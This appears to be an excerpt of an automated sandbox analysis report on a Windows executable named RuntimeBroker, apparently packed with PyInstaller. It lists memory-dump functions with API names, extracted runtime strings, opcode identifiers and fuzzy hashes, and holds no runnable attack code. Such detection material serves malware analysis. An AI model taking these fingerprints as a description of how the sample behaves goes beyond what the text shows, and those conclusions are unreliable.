                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                                                                                                                                • API String ID: 2943138195-2309034085
                                                                                                                                                                                • Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                                                                                                • Instruction ID: 75f951bc9a18639167acf41d4933011167a3d54bf889aaaf8c70db6af05b3c30
                                                                                                                                                                                • Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE16C62E8C71295FB24DB6CC9B41FCA7A6AF45744F440136DB0E26AB9DF3CA904C358
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 3436797354-393685449
                                                                                                                                                                                • Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                                                                                                • Instruction ID: 7dfc5758ca576bf1d0fed68bfae7b545af7184933cac089d0ac8c2fb7959f44c
                                                                                                                                                                                • Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                                                                                                • Instruction Fuzzy Hash: 30D1A372A48B428AEB20DF69D4A12AD77A6FF45B98F100135EF8D57B65CF38E190C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                • Instruction ID: d3ece5d01bbbb18aa78b8ac3ae954657df6fdaa7de3286a86073c4a7a856e066
                                                                                                                                                                                • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                • Instruction Fuzzy Hash: 635109266047A186D6349F26E4581BAF7A1FB98B61F404135EFDE43794DF3CD085DB20
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                • API String ID: 0-3207858774
                                                                                                                                                                                • Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                                                                                                • Instruction ID: 4f6c0fb73b9f3bbbe658a22914e7a0d73c142a055f980942886ef65456ffc252
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                                                                                                • Instruction Fuzzy Hash: 92916E62A88A4699FB20CB29D4A02F877A2BF54B44F444131EB6E037B5DF3DE545C358
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+$Name::operator+=
                                                                                                                                                                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                • API String ID: 179159573-1464470183
                                                                                                                                                                                • Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                                                                                                • Instruction ID: 1b71bbaef17b5342e61b33eebdd50e45ea8e81d213994d3bc2ba7ce068895375
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                                                                                                • Instruction Fuzzy Hash: 63515972F98A2289FB14CB6CE8A05BC37B2BF14784F504135EF0D66AA8DF29E545D704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2943138195-0
                                                                                                                                                                                • Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                                                                                                • Instruction ID: 230c0c2e9b0545fd4f01df26a53a2b7af125933795249f4ab23ab2ecb0128a01
                                                                                                                                                                                • Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F616B62B04B5298FB10DBA8D8A01EC33B6BF44788F408536DF4D6BAA9DF78D545C344
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                • Instruction ID: 3a1a93cdc9a6f0daa4fbd485d14f13044375d76433174507a8c73f4f7c267376
                                                                                                                                                                                • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                • Instruction Fuzzy Hash: FE129031B0824B86FB36BB19D95427DE651FB48750FD4413AE789466E6EF3CE9808F20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                • Instruction ID: d23e6f81f4635485ad61dec4e4781a4c61a9f2389b2a0e2181bc2c83a5edb76a
                                                                                                                                                                                • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 44128471F4C14386FB35BB18D894A79E261FB94754FC88039E699466E4EF7CE4808F60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 211107550-393685449
                                                                                                                                                                                • Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                                                                                                • Instruction ID: 941eaac9f84e7e2a1df3fb51e6080d098b0c6a54385573a170ff7ed8d2e5baec
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                                                                                                • Instruction Fuzzy Hash: 18E1DE72A487828AE710DF68D4A12AD7BA2FF45B48F244136EB8D53776CF38E585C704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                • Opcode ID: 4ae8fd5b95060b3838ac946bbc1241e3e0ff1853dfe5bebea26071531e7b2444
                                                                                                                                                                                • Instruction ID: 66492195f0ef10e113b8ef074408a1253e2f3314250ab292c40fd796f3e19c80
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae8fd5b95060b3838ac946bbc1241e3e0ff1853dfe5bebea26071531e7b2444
                                                                                                                                                                                • Instruction Fuzzy Hash: FC41AF21B0864642EA32BB1AAC905BAE390FF44BC4FC44031DD4D47BB5EE3CE8458B24
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                • API String ID: 2943138195-2239912363
                                                                                                                                                                                • Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                                                                                                • Instruction ID: 696e18d3d82b10e6f0173f4d0a13381641946f57a0cf543c0146ba727d75e3a1
                                                                                                                                                                                • Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                                                                                                • Instruction Fuzzy Hash: 95515862E58B569AFB11CB68D8912BC77B2BF08748F444136EB4D12BB5DF3CA044CB18
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                • API String ID: 2895956056-699529898
                                                                                                                                                                                • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                • Instruction ID: c404638555abeb3a581b376031f73904b500fd55e5137030cea9cb5faedec2c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                • Instruction Fuzzy Hash: 97413F31A1878181DA31AB28E8952AEF391FBC9364F944739E6AD43BE5DF7CD1448F10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                • Instruction ID: e48fad1f0e5b5b7ef7c7672a152cc725cef7ad8491b71f53b0e99254011291a5
                                                                                                                                                                                • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                • Instruction Fuzzy Hash: C6D19632A0874186EB31AB69D8C03ADB7A4FB55788F504235DE8D57FA5DF38E491CB20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                                                                • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                                • API String ID: 1852475696-928371585
                                                                                                                                                                                • Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                                                                                                • Instruction ID: 7ce0a6f9054f1410d3a7e3bef4617b461ed6dd7c327eaf5642040df0014503f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                                                                                                • Instruction Fuzzy Hash: F151C272A5DA4692EE24DB59E8A06BE6362FF44B84F404431EB8E07775EF3CE505C304
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+$Name::operator+=
                                                                                                                                                                                • String ID: {for
                                                                                                                                                                                • API String ID: 179159573-864106941
                                                                                                                                                                                • Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                                                                                                • Instruction ID: 5d98e19601e749568f3cae8178d784de52d108a86e12ded1eebcf848318f4fff
                                                                                                                                                                                • Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B515672A48A85A9EB11CF28D4953EC23A2FF44B48F808031EB5C1BBA5DF7CD554C358
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057CE4
                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057D2C
                                                                                                                                                                                  • Part of subcall function 00007FF72B057E10: GetEnvironmentVariableW.KERNEL32(00007FF72B05365F), ref: 00007FF72B057E47
                                                                                                                                                                                  • Part of subcall function 00007FF72B057E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B057E69
                                                                                                                                                                                  • Part of subcall function 00007FF72B067548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067561
                                                                                                                                                                                  • Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                • API String ID: 740614611-1339014028
                                                                                                                                                                                • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                                                                                                • Instruction ID: 866b8e1216ac7c22f96000f58ce65c0b198d16ce94fe039142eb47ad575d0073
                                                                                                                                                                                • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                                                                                                • Instruction Fuzzy Hash: D6418C61B0964244EA36FB299D912F9D291FF89780FC40135DD0D57BB6EE3CF5009B60
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B6931
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B693F
                                                                                                                                                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B6958
